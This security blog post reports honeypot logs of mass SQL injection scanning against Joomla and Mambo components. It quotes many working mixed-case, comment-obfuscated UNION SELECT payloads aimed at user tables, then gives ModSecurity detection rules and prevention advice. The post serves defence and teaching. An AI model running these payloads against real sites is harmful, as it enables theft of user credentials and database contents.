[Honeypot Alert] SQL Injection Scanning Update - Filter Evasions Detected

As we reported in the previous [Honeypot Alert] WordPress/Joomla/Mambo SQL Injection Scanning Detected alert - we have identified an increase in mass SQL Injection scanning targeting various community components.

While this scanning is still ongoing, we have identified a slight variation if the attack methodology used. Here are examples from today's web server logs:

GET /index.php?option=com_acprojects&page=7&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_acprojects&page=7&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1GET /index.php?option=com_acstartseite&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1GET /index.php?option=com_acteammember&Itemid=121&lang=en&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_agency&task=view&aid=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_bidding&id=-200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_blog&task=viewdetails&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_comp&task=view&cid=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_departments&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_gigfe&task=style&styletype=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_hezacontent&view=item&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_jeeventcalendar&template=system&view=event&Itemid=155&event_id=-1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_mambads&Itemid=39&func=view&cacat=33&casb=1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C0x33633273366962%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1GET /index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_party&view=party&task=details&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_personal&pid=56&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_products&op=category_details&intCategoryId=-222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_products&op=category_details&intCategoryId=-222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- HTTP/1.1GET /index.php?option=com_route&routing&kid=-35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_science&view=science&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_start&task=main&mitID=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_teacher&view=teacher&id=-1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1GET /index.php?option=com_yanc&Itemid=75&listid=-2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1

Can you spot the difference in the SQL Injection payloads?

Mixed-Case Attack Payloads

The attackers are now using mixed-case in the SQL commands.

GET /index.php?option=com_acprojects&page=7&lang=de&Itemid=null and 1=2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- HTTP/1.1

The purpose of mixing case of these attack payloads is to potentially evade any poorly constructed input validation blacklist filters.

Blacklist Filtering

Blacklist filtering is often used as a part of input validation in order to easily block known back payloads. Here is a common blacklist filtering question posed to the community about preventing SQL Injection:

Screen shot 2011-12-15 at 10.26.10 AM
While this person has correctly specified a number of key SQL functions used in SQL Injection attacks, the error of ommision in this case is that the regular expression is assuming that the payloads will be in lowercase format. As we have seen in the honeypot log examples above, attackers can and will use mixed case as it is functionally equivalent code to the database.

When writing blacklist filters, care should be taken to normalize data to prevent this type of evasion. In the OWASP ModSecurity Core Rule Set, we use two different techniques to handle mixed-case evasions:

Transformation Functions

Many rules use the "t:lowercase" trasformation function to change all payloads to lowercase before applying the operator check.

SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pm select show top distinct from dual where group by order having limit offset union rownum as (case""phase:2,id:'981300',t:none,t:urlDecodeUni,t:removeCommentsChar,t:lowercase,nolog,pass,nolog,setvar:'tx.sqli_select_statement=%{tx.sqli_select_statement} %{matched_var}'"

While this process works, it does incur a performance hit in latency.

Ignore Case RegEx Flags

The other option is to modify the PCRE regular expression rule itself and apply the "IGNORE_CASE" modifier flag. In ModSecurity, this is accomplished by using one of the following syntaxs:

(?i)REGEX

  • "(?i)(var[^=]+=\s*unescape\s*;)"

(?i:REGEX)

  • "(?i:<\s*IFRAME\s*?[^>]*?src=\"javascript:)"

If you are using any blacklist filtering as part of input validation, I highly suggest you verify how you are handling mixed-case payloads.

SQL Injection Prevention

While blacklist filtering has it uses, it should not be used as the only method of preventing any attacks. Whitelist filtering of input is highly recommended in order to ensure that data is of the correct size, character sets and format.

For SQL Injection, it is recommended that all developers review the OWASP SQL Injection Prevention Cheatsheet which has excellent guidance on properly constructing SQL queries.

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.